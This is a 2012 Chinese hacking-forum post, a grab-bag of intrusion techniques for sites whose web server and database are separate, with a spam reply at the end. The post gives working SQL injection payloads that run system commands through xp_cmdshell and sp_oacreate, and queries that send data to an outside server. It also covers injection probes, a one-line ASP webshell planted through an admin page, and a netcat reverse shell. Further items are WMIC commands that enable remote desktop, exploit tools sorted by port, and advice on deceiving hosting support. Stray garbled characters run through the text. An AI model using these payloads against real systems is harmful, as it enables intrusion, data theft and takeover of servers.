找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3544|回复: 1

站库分离的方法

[复制链接]
发表于 2012-9-15 14:41:29 | 显示全部楼层 |阅读模式
SA点数据库分离技术相关
1 @/ `" Z: B7 H
* d% B- n; U6 o8 [; P+ o0 |' C7 A/ s4 d% G
SA点数据库分离搞法+语句:% \3 J7 G' V, I  A' a9 E  Y
& m) ~1 [. i3 ]2 |
注射点不显错,执行下面三条语句页面都返回正常。) K' M# v- H* U3 Y" Z2 C! {7 o
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')  |! ^( B6 b0 f( ~/ N
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
2 f# f7 r0 c6 |9 S" n9 w. E+ b' sand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
% |- u8 N4 L$ N可以列目录,判断系统为2000,web与数据库分离' m! \* E; p" _+ W0 a% y! G
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。1 A0 J* ~% C, Q0 R8 q, Q, l* e% _
在注射点上执行
7 Z6 L# \! L' C0 Kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--* Q+ K3 I4 @9 [- \6 X
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP4 X- f/ |7 M; x7 v2 j! i) Z) {) z
还有我用NC监听得其他端口都没有得到IP。
4 I! K% ~; Q" q& U3 s9 L8 ?, _) `- G/ \8 h' H* _7 k$ l0 x1 K
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
! z/ `4 p# O# S7 k! Z* V# G'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
' s* Q9 K! R' u5 m4 E5 D3 {4 L# ~/ ~
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--  |, p" k- ?; N' O
9 S2 P7 Z$ L, B
现在就猜想是不是数据库是内网而且不能连外网。- y" X5 B) I; _. q" o
7 X) |3 K1 Z8 g$ ?; M: ^

+ i% B5 {# d6 [' W$ d  Laccess导出txt文本代码, A8 n% G* B  M3 J# e
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin& m$ e! }5 K: [: A' _' x: G2 |- m( _; x
+ }0 Q4 |- F5 ^: x$ V$ r7 l

; @. E6 n. k5 l; P; @1 s0 v
: E' h4 Z+ y6 i3 B7 x自动跳转到指定网站代码头
) ^& g& B! D4 B7 a6 K% l  g<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
; D4 J' m8 I4 e
: G+ `: P; y9 ?" P1 l" U* J
. u7 F+ `' O  V5 _0 ?) O入侵java or jsp站点时默认配置文件路径:
2 _$ V% }$ _  [" n5 z' E' r\web-inf\web.xml# K7 p/ J' F5 j* w) ^3 Z1 A/ A
tomcat下的配置文件位置:$ R  I9 U. u4 z5 V  g
\conf\server.xml            (前面加上tomcat路径)
) D3 |7 Z! H1 [0 L9 l. e\Tomcat 5.0\webapps\root\web-inf\struts-config.xml5 ^% [: g6 ~- h' H
9 v# p/ z9 ?" [& c0 A$ \
; ?* K& s, c5 S6 n' z. |9 h. G! z
/ G( C0 k" ]: @% c6 y, M" g( P/ b' G% w0 \
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
- N% J6 b8 u0 O-1%23
8 g* Y* ^$ H% z4 I6 |, `) f> - h/ \: p; f. Z3 y6 i0 T5 n
<3 f* b. V* [7 k* A. x4 ]1 _
1'+or+'1'='1& H% o# L" D3 t# I2 A$ Y+ C
id=8%bf
8 v9 o  k/ g7 N6 Q+ i& O  ?
8 m! E2 C; u* i, @* h- n0 y" {全新注入点检测试法:  |8 }* s6 G; M  @4 g7 J6 b
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
' q. j8 _2 B5 Z6 o& e2 a! T# x
" c* p- w0 b2 {. x" }$ \: j/ N7 f在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
5 s) C: S7 q  ~* P' i, g+ z) W
0 x7 s0 w. ~7 W搜索型注入判断方法:3 |/ a/ `; N) ?, c/ z8 A9 ?
北京%' and '1'='1' and '%'='1 ~2 J8 X- C( k) }7 o
北京%' and '1'='2' and '%'='" _0 ^$ D9 g# E, Y; S
8 F9 J  Y8 D3 d

8 X+ m2 B- D4 B$ N1 M! B! I6 rCOOKIES注入:2 M+ y9 E0 z4 |4 k# s1 O
) q: P# I8 {# C$ K5 _
javascript:alert(document.cookie="id="+escape("51 and 1=1"));( U) I7 V% B4 [4 x: X. d+ X! t

% y4 e; F# t" e2000专业版查看本地登录用户命令:. J) b) i1 }& c
net config workstation8 z2 L9 P! W/ E9 s, ?$ q" F. d

5 L; i' i* V, }! I" W  }9 m2 i9 k) |( r, `$ F
2003下查看ipsec配置和默认防火墙配置命令:
# M, ]0 i' q; R7 Inetsh firewall show config8 I0 i( X# @( \+ A
netsh ipsec static show all+ A/ Q, S5 C/ \; m7 g% W

, A; K: @7 y; [) ~不指派指定策略命令:* B, q% i; \5 y; I  a7 n9 |1 y
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
0 L6 `2 U* y! f: x2 W8 K, y6 D2 Rnetsh ipsec static show policy all  显示策略名" A) s$ x# B* l8 K" W& R" j; |

4 b% I4 d5 R4 b  h6 }% u7 T7 {4 t7 s9 f
猜管理员后台小技巧:
# u. @) ?/ c4 A! badmin/left.asp * y( d* i; J. o6 G) d7 {
admin/main.asp' w8 {" Z/ q6 q4 p/ T4 n
admin/top.asp4 H5 q2 h7 l: c6 ]( _
admin/admin.asp - u$ d+ G6 @/ g/ E% l  a( E: w
会现出菜单导航,然后迅雷下载全部链接$ Y4 W0 ]( R$ I+ f. }) i2 P

3 S& z$ [" x! R" P1 [  ^: k+ ?
, Y$ B, d% B& M" Z社会工程学:
: s7 s0 O+ d4 F- N6 B' n6 n用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人+ [! E9 u. J* c8 L3 o7 N9 D
然后去骗客服7 @% _& H/ W+ V' L2 |- V' I  x
9 n; h- Y& B. w& N$ ~( h$ N
0 H; Y2 G8 P$ T7 b
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
: T3 ]. x( e$ @, z查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
9 d- z  N/ y7 p* H4 Y  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
7 z) |2 }4 y7 @# N5 E& P- P& V+ K# b
2 o& }3 z$ |( r% {
. t, ?$ E% O% B# G0 p
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
+ W+ ]; |" q, K2 ^2 [  B8 Z6 X) f( D5 y! w  C8 H' m
; B5 B4 G+ ]. u7 U
7 s4 r3 c! D& ?) }  [
CMD加密注册表位置+ B9 c& o' m  ]& c( ]' q
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
( u1 {- S/ j1 ]2 H( i' ~; tAutoRun
8 C5 Z' U# _6 U; @8 Y% T4 s( E. z
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
0 ~7 x8 ?% u/ [. P& f/ P2 LAutoRun
0 Z$ @! J+ [; m$ E
6 ?. Z5 F2 l. d) X" L; F# n
; g( w( \( w2 d/ M; o; Y$ n在找注入时搜索Hidden,把他改成test
  m! J" e; ?4 c: V# S. U9 _  G- d6 Q4 D: Q+ ?6 y' J

/ H3 d) D: B2 ^! G* i# g0 w, e8 A/ P9 k) K$ K: N- T! {4 f# V% i
mstsc /v:IP /console / N, Z% w8 J+ k
" I$ I9 c9 ^- l

" V3 r2 H7 g: i$ R5 J一句话开3389:7 x4 _+ |( `& N, y3 I. r( ^. }
/ y9 O# F$ q7 e: X- P; o- Z
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
! T+ X! e+ P# `, m3 `; b/ T开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.& S+ }/ e0 U* [) w9 O
/ D4 O' X; C2 i  |

% c  g( b  f) o. n4 b知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:2 Y2 x4 H3 }2 t9 }& X: M& @
Insert into admin(user,pwd) values('test','test')$ o3 y9 b, |, z. ]3 j2 j
$ j3 G$ `4 [3 A% d5 O5 ]

5 H) [( F2 ^. t/ i2 D2 `5 ^NC反弹8 Q# g# i  G5 }' r- z
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
6 a4 b8 b! Y6 E+ U* O6 x7 x然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)1 K& g# n& m) ~4 }

$ U3 b- i" l! w2 g0 L- C- d! ^6 Z% j& R, ]4 |4 R
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题. h* o+ i6 e" H
2 T/ k2 _, s7 ]6 D
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录* n; l4 w" ~/ z% m* y' b5 C! w) }
例如:/ [) A' i: x* m$ k7 _
subst k: d:\www\ 用d盘www目录替代k盘
3 d- w! Q7 ?2 {9 j/ Q$ Qsubst k: /d  解除K盘代替
回复

使用道具 举报

匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表